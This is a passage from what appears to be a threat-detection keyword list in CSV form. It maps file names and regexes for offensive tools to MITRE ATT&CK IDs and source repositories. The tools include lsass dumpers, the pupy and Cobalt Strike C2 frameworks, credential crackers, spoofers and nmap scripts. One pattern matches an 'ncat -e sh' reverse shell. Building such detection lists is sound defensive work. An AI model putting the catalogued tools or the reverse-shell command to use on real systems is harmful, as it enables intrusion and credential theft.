Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*/NativeDump.git*",".{0,1000}\/NativeDump\.git.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" 
"*/nat-pmp-info.nse*",".{0,1000}\/nat\-pmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nat-pmp-mapport.nse*",".{0,1000}\/nat\-pmp\-mapport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nbd-info.nse*",".{0,1000}\/nbd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nbns-interfaces.nse*",".{0,1000}\/nbns\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nbnsspoof.py*",".{0,1000}\/nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/nbstat.nse*",".{0,1000}\/nbstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NBTNS.py*",".{0,1000}\/NBTNS\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/nc_srv.bat",".{0,1000}\/nc_srv\.bat","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*/ncat * -e sh*",".{0,1000}\/ncat\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/nccgroup/nccfsas/*",".{0,1000}\/nccgroup\/nccfsas\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/ncp-enum-users.nse*",".{0,1000}\/ncp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ncp-serverinfo.nse*",".{0,1000}\/ncp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ncrack-*",".{0,1000}\/ncrack\-.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","0","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*/ncrack.git*",".{0,1000}\/ncrack\.git.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" 
"*/ndmp-fs-info.nse*",".{0,1000}\/ndmp\-fs\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ndmp-version.nse*",".{0,1000}\/ndmp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ndp_spoof*",".{0,1000}\/ndp_spoof.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/Needle_Sift_BOF/*",".{0,1000}\/Needle_Sift_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" "*/Nemesis.git*",".{0,1000}\/Nemesis\.git.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nemesis_connector.py*",".{0,1000}\/nemesis_connector\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nemesis_db.py*",".{0,1000}\/nemesis_db\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nemesis_reg_collect_parser.py*",".{0,1000}\/nemesis_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nemesis-cli.py*",".{0,1000}\/nemesis\-cli\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/nessus.py*",".{0,1000}\/nessus\.py.{0,1000}","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/nessus.rb*",".{0,1000}\/nessus\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/nessus-brute.nse*",".{0,1000}\/nessus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nessus-xmlrpc-brute.nse*",".{0,1000}\/nessus\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/net_4.0_32_RunasCs.exe*",".{0,1000}\/net_4\.0_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_32SharpDoor.exe*",".{0,1000}\/net_4\.0_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_32sharpfiles.exe*",".{0,1000}\/net_4\.0_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_64_RunasCs.exe*",".{0,1000}\/net_4\.0_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_64SharpDoor.exe*",".{0,1000}\/net_4\.0_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_64sharpfiles.exe*",".{0,1000}\/net_4\.0_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_Any_RunasCs.exe*",".{0,1000}\/net_4\.0_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_AnySharpDoor.exe*",".{0,1000}\/net_4\.0_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.0_Anysharpfiles.exe*",".{0,1000}\/net_4\.0_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_32_RunasCs.exe*",".{0,1000}\/net_4\.5_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_32SharpDoor.exe*",".{0,1000}\/net_4\.5_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_32sharpfiles.exe*",".{0,1000}\/net_4\.5_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_64_RunasCs.exe*",".{0,1000}\/net_4\.5_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_64SharpDoor.exe*",".{0,1000}\/net_4\.5_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_64sharpfiles.exe*",".{0,1000}\/net_4\.5_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_Any_RunasCs.exe*",".{0,1000}\/net_4\.5_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_AnySharpDoor.exe*",".{0,1000}\/net_4\.5_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
